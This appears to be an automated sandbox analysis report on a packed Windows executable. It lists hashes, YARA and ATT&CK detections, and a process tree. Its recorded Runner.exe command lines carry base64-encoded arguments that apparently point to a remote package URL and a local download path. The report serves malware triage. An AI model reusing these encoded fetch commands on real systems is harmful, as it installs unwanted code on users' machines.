06aa393ec4cef895ebbf9923200f9f5d71df6ae27f091004c89176a92825014f

Analysis

max time kernel
128s
max time network
131s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
25/05/2024, 22:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
Size

1.8MB
MD5

737a01de80632b31c202d99dc292888a
SHA1

5605e5c949c9e7565d1b6df783dfa1a990ce9b8a
SHA256

06aa393ec4cef895ebbf9923200f9f5d71df6ae27f091004c89176a92825014f
SHA512

4aa29c369c6462337ed713c00fdff66cc4dcf5e7ba4a5ba1097f1a5bf0ace6d94b4128a3db7824cde511b81b9193243447de261504dee6c1b860e4d8aaf29c60
SSDEEP

24576:0rMMUKDlavjUEQElhcjUuS+kQ0LaSA8o19MNMeE5GKSL1hCGjOFCYzfCADRXriJe:0rMMLlavoRkQb8CuMebPbNYR2iuK/

Score

7^/10

upx

Malware Config

Signatures

ACProtect 1.3x - 1.4x DLL software 7 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x0006000000015d4a-32.dat	acprotect
behavioral1/memory/2336-53-0x00000000003D0000-0x00000000003DA000-memory.dmp	acprotect
behavioral1/memory/2336-81-0x00000000003D0000-0x00000000003DA000-memory.dmp	acprotect
behavioral1/memory/2336-61-0x00000000003D0000-0x00000000003DA000-memory.dmp	acprotect
behavioral1/memory/2336-58-0x00000000003D0000-0x00000000003DA000-memory.dmp	acprotect
behavioral1/memory/2336-159-0x00000000003D0000-0x00000000003DA000-memory.dmp	acprotect
behavioral1/memory/2336-162-0x00000000003D0000-0x00000000003DA000-memory.dmp	acprotect

Executes dropped EXE 64 IoCs

pid	Process
2072	RtHelp.exe
3028	RtHelp.exe
2968	Runner.exe
1296	Runner.exe
1804	Runner.exe
540	Runner.exe
544	Runner.exe
2244	Runner.exe
304	Runner.exe
940	Runner.exe
896	Runner.exe
2340	Runner.exe
2044	Runner.exe
2024	Runner.exe
3024	Runner.exe
2648	Runner.exe
2576	Runner.exe
2580	Runner.exe
2504	Runner.exe
2456	Runner.exe
2956	Runner.exe
2476	Runner.exe
2696	Runner.exe
2000	Runner.exe
1816	Runner.exe
1444	Runner.exe
2792	Runner.exe
776	Runner.exe
1736	Runner.exe
2068	Runner.exe
1564	Runner.exe
1264	Runner.exe
1036	Runner.exe
1820	Runner.exe
1504	Runner.exe
884	Runner.exe
1592	Runner.exe
2620	Runner.exe
2196	Runner.exe
2748	Runner.exe
2468	Runner.exe
2472	Runner.exe
2484	Runner.exe
2972	Runner.exe
2248	Runner.exe
1276	Runner.exe
1284	Runner.exe
1864	Runner.exe
2884	Runner.exe
720	Runner.exe
672	Runner.exe
544	Runner.exe
984	Runner.exe
1564	Runner.exe
1264	Runner.exe
2372	Runner.exe
472	Runner.exe
2316	Runner.exe
1600	Runner.exe
2584	Runner.exe
2532	Runner.exe
2668	Runner.exe
2072	Runner.exe
3060	Runner.exe

Loads dropped DLL 64 IoCs

pid	Process
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2072	RtHelp.exe
2072	RtHelp.exe
2072	RtHelp.exe
2072	RtHelp.exe
2072	RtHelp.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
3028	RtHelp.exe
3028	RtHelp.exe
3028	RtHelp.exe
3028	RtHelp.exe
3028	RtHelp.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2968	Runner.exe
2968	Runner.exe
2968	Runner.exe
2968	Runner.exe
2968	Runner.exe
1296	Runner.exe
1296	Runner.exe
1296	Runner.exe
1296	Runner.exe
1296	Runner.exe
1804	Runner.exe
1804	Runner.exe
1804	Runner.exe
1804	Runner.exe
1804	Runner.exe
540	Runner.exe
540	Runner.exe
540	Runner.exe
540	Runner.exe
540	Runner.exe
544	Runner.exe
544	Runner.exe
544	Runner.exe
544	Runner.exe
544	Runner.exe
2244	Runner.exe
2244	Runner.exe
2244	Runner.exe
2244	Runner.exe
2244	Runner.exe
304	Runner.exe
304	Runner.exe
304	Runner.exe
304	Runner.exe
304	Runner.exe
940	Runner.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000015d4a-32.dat	upx
behavioral1/memory/2336-53-0x00000000003D0000-0x00000000003DA000-memory.dmp	upx
behavioral1/memory/2336-81-0x00000000003D0000-0x00000000003DA000-memory.dmp	upx
behavioral1/memory/2336-61-0x00000000003D0000-0x00000000003DA000-memory.dmp	upx
behavioral1/memory/2336-58-0x00000000003D0000-0x00000000003DA000-memory.dmp	upx
behavioral1/memory/2336-159-0x00000000003D0000-0x00000000003DA000-memory.dmp	upx
behavioral1/memory/2336-162-0x00000000003D0000-0x00000000003DA000-memory.dmp	upx

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	RtHelp.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	RtHelp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2336 wrote to memory of 2072	2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe	28
PID 2336 wrote to memory of 2072	2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe	28
PID 2336 wrote to memory of 2072	2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe	28
PID 2336 wrote to memory of 2072	2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe	28
PID 2336 wrote to memory of 3028	2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe	29
PID 2336 wrote to memory of 3028	2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe	29
PID 2336 wrote to memory of 3028	2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe	29
PID 2336 wrote to memory of 3028	2336	737a01de80632b31c202d99dc292888a_JaffaCakes118.exe	29
PID 2836 wrote to memory of 2968	2836	taskeng.exe	32
PID 2836 wrote to memory of 2968	2836	taskeng.exe	32
PID 2836 wrote to memory of 2968	2836	taskeng.exe	32
PID 2836 wrote to memory of 2968	2836	taskeng.exe	32
PID 2968 wrote to memory of 1296	2968	Runner.exe	33
PID 2968 wrote to memory of 1296	2968	Runner.exe	33
PID 2968 wrote to memory of 1296	2968	Runner.exe	33
PID 2968 wrote to memory of 1296	2968	Runner.exe	33
PID 2968 wrote to memory of 1804	2968	Runner.exe	34
PID 2968 wrote to memory of 1804	2968	Runner.exe	34
PID 2968 wrote to memory of 1804	2968	Runner.exe	34
PID 2968 wrote to memory of 1804	2968	Runner.exe	34
PID 2968 wrote to memory of 540	2968	Runner.exe	35
PID 2968 wrote to memory of 540	2968	Runner.exe	35
PID 2968 wrote to memory of 540	2968	Runner.exe	35
PID 2968 wrote to memory of 540	2968	Runner.exe	35
PID 2968 wrote to memory of 544	2968	Runner.exe	36
PID 2968 wrote to memory of 544	2968	Runner.exe	36
PID 2968 wrote to memory of 544	2968	Runner.exe	36
PID 2968 wrote to memory of 544	2968	Runner.exe	36
PID 2968 wrote to memory of 2244	2968	Runner.exe	37
PID 2968 wrote to memory of 2244	2968	Runner.exe	37
PID 2968 wrote to memory of 2244	2968	Runner.exe	37
PID 2968 wrote to memory of 2244	2968	Runner.exe	37
PID 2968 wrote to memory of 304	2968	Runner.exe	38
PID 2968 wrote to memory of 304	2968	Runner.exe	38
PID 2968 wrote to memory of 304	2968	Runner.exe	38
PID 2968 wrote to memory of 304	2968	Runner.exe	38
PID 2968 wrote to memory of 940	2968	Runner.exe	39
PID 2968 wrote to memory of 940	2968	Runner.exe	39
PID 2968 wrote to memory of 940	2968	Runner.exe	39
PID 2968 wrote to memory of 940	2968	Runner.exe	39
PID 2968 wrote to memory of 896	2968	Runner.exe	40
PID 2968 wrote to memory of 896	2968	Runner.exe	40
PID 2968 wrote to memory of 896	2968	Runner.exe	40
PID 2968 wrote to memory of 896	2968	Runner.exe	40
PID 2968 wrote to memory of 2340	2968	Runner.exe	41
PID 2968 wrote to memory of 2340	2968	Runner.exe	41
PID 2968 wrote to memory of 2340	2968	Runner.exe	41
PID 2968 wrote to memory of 2340	2968	Runner.exe	41
PID 2968 wrote to memory of 2044	2968	Runner.exe	42
PID 2968 wrote to memory of 2044	2968	Runner.exe	42
PID 2968 wrote to memory of 2044	2968	Runner.exe	42
PID 2968 wrote to memory of 2044	2968	Runner.exe	42
PID 2968 wrote to memory of 2024	2968	Runner.exe	43
PID 2968 wrote to memory of 2024	2968	Runner.exe	43
PID 2968 wrote to memory of 2024	2968	Runner.exe	43
PID 2968 wrote to memory of 2024	2968	Runner.exe	43
PID 2968 wrote to memory of 3024	2968	Runner.exe	44
PID 2968 wrote to memory of 3024	2968	Runner.exe	44
PID 2968 wrote to memory of 3024	2968	Runner.exe	44
PID 2968 wrote to memory of 3024	2968	Runner.exe	44
PID 2968 wrote to memory of 2648	2968	Runner.exe	45
PID 2968 wrote to memory of 2648	2968	Runner.exe	45
PID 2968 wrote to memory of 2648	2968	Runner.exe	45
PID 2968 wrote to memory of 2648	2968	Runner.exe	45

C:\Users\Admin\AppData\Local\Temp\737a01de80632b31c202d99dc292888a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\737a01de80632b31c202d99dc292888a_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2336
- C:\Users\Admin\AppData\Local\Temp\7BCE567A-7556-CC4D-9563-461F6AD885D1\RtHelp.exe
  "C:\Users\Admin\AppData\Local\Temp\7BCE567A-7556-CC4D-9563-461F6AD885D1\RtHelp.exe" --InstSupp --Supp 500 --Ver 180
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2072
- C:\Users\Admin\AppData\Local\Temp\7BCE567A-7556-CC4D-9563-461F6AD885D1\RtHelp.exe
  "C:\Users\Admin\AppData\Local\Temp\7BCE567A-7556-CC4D-9563-461F6AD885D1\RtHelp.exe" --PreCheck 500 --Uid 17573426D3D1F348838F61F66578B245 --Ver 180
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Maps connected drives based on registry
  PID:3028
- C:\Users\Admin\AppData\Local\Temp\nsz16DD.tmp
  "C:\Users\Admin\AppData\Local\Temp\nsz16DD.tmp" /S _?=C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47
  2⤵
  PID:3024
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --Uninstall
    3⤵
    PID:2464

C:\Windows\system32\taskeng.exe
taskeng.exe {050EF948-0CCA-4087-94D5-4D06993F98A7} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:S4U:
1⤵
- Suspicious use of WriteProcessMemory
PID:2836
- C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
  C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2968
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1296
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1804
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:540
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:544
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2244
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:304
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:940
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:896
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2340
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2044
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2024
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:3024
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2648
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2576
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2580
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2504
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2456
